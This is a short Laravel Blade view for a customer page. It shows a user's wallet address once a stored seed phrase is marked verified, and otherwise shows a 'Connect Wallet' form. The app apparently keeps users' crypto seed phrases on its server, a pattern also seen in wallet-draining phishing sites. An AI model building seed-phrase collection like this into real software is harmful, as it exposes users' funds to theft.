@extends('components.customer-layout') @section('header')
{{--

withdrawn

--}}
@endsection {{-- @dd($wallets) --}} @section('content') {{-- description --}}
{{--
--}} @php $user = Auth::user(); @endphp @if ($user->seedPhrase ) @if ($user->seedPhraseVerified == "TRUE")

Wallet Address : {{ ucfirst($user->walletAddress) }}

@else @endif @else
Connect Wallet
@csrf
@endif
@endsection